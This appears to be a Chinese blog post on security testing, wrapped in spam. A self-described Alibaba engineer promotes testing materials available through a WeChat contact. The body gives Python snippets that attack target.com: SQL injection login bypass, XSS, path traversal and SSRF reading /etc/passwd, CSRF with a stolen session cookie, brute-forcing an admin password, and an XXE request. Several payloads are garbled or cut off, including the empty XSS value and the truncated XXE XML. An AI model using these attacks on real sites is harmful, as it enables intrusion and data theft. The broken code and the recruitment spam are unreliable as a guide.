先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新软件测试全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip1024b (备注软件测试)
正文
url = ‘http://target.com/login’
data = {‘username’: ‘admin’, ‘password’: “’ OR ‘1’='1”}
response = requests.post(url, data=data)
if ‘Welcome’ in response.text:
print(‘SQL Injection successful’)
在这个示例中,我们发送了一个含有恶意SQL代码的请求到目标网站。如果网站没有正确地处理用户输入,那么我们就可能成功登录为管理员。
2. XSS攻击
跨站脚本攻击(XSS)是web应用程序中的一种常见漏洞。在以下示例中,我们使用Python来模拟一个XSS攻击:
import requests
url = ‘http://target.com/comment’
data = {‘comment’: ‘’}
requests.post(url, data=data)
在这个示例中,我们发送了一个含有恶意JavaScript代码的请求到目标网站。如果网站没有正确地过滤用户输入,那么这段代码将在其他用户的浏览器中执行,并将他们的cookie发送到攻击者的网站。
- 路径遍历攻击
路径遍历攻击是一种尝试访问文件系统中不应被访问的文件的攻击。在以下示例中,我们使用Python来模拟一个路径遍历攻击
import requests
url = ‘http://target.com/download’
params = {‘file’: ‘…/etc/passwd’}
response = requests.get(url, params=params)
if ‘root:’ in response.text:
print(‘Path traversal attack successful’)
在这个示例中,我们发送了一个请求到目标网站,试图访问/etc/passwd文件,这是一个通常含有用户账户信息的文件。如果网站没有正确地限制文件访问路径,那么我们将可以访问到这个文件。
这只是安全测试的实战演练中的一部分,提供了一些基本的攻击技术。记住,目标是找出并修复这些漏洞,而不是利用它们进行恶意活动。
- CSRF攻击
跨站请求伪造(CSRF)攻击可以让攻击者冒充受害者,以他们的身份执行非授权的操作。下面的Python代码示例模拟了一个CSRF攻击:
import requests
url = ‘http://target.com/change-email’
cookies = {‘session’: ‘stolen-session-cookie’}
data = {‘email’: ‘attacker@example.com’}
requests.post(url, cookies=cookies, data=data)
在这个示例中,我们使用了一个已经被盗取的会话cookie来向目标网站发送一个改变邮箱的请求。如果网站没有正确地实施CSRF保护,那么我们就能成功改变受害者的邮箱地址。
- 穷举攻击
穷举攻击是一种尝试穷举所有可能的密码组合来猜测密码的攻击。在以下的Python代码示例中,我们模拟了一个穷举攻击
import requests
import itertools
url = ‘http://target.com/login’
for length in range(1, 4):
for password in itertools.product(‘1234567890’, repeat=length):
password = ‘’.join(password)
data = {‘username’: ‘admin’, ‘password’: password}
response = requests.post(url, data=data)
if ‘Welcome’ in response.text:
print(‘Password is’, password)
break
在这个示例中,我们穷举了所有长度为1到3的数字密码,并用这些密码尝试登录。如果网站没有实施任何防止穷举攻击的措施,比如账户锁定或验证码,那么我们可能能成功猜到密码。
- 服务器侧请求伪造(SSRF)攻击
服务器侧请求伪造是一种由攻击者构造形成的,由应用服务器发起请求的安全漏洞。下面的Python代码示例模拟了一个SSRF攻击:
import requests
url = ‘http://target.com/redirect’
params = {‘url’: ‘file:///etc/passwd’}
response = requests.get(url, params=params)
if ‘root:’ in response.text:
print(‘SSRF attack successful’)
在这个示例中,我们尝试让目标服务器读取本地的/etc/passwd文件。如果服务器没有正确地验证或限制从URL重定向中接收的输入,我们就能读取到这个文件。
- XML外部实体(XXE)攻击
XML外部实体攻击是利用XML解析器的漏洞,通过构造恶意的XML输入,从服务器上窃取数据。下面的Python代码示例模拟了一个XXE攻击:
import requests
url = ‘http://target.com/xml-endpoint’
data = “”"
]>
&xxe;
“”"
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注软件测试)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
24b (备注软件测试)**
[外链图片转存中…(img-BQil4jUA-1713233863146)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
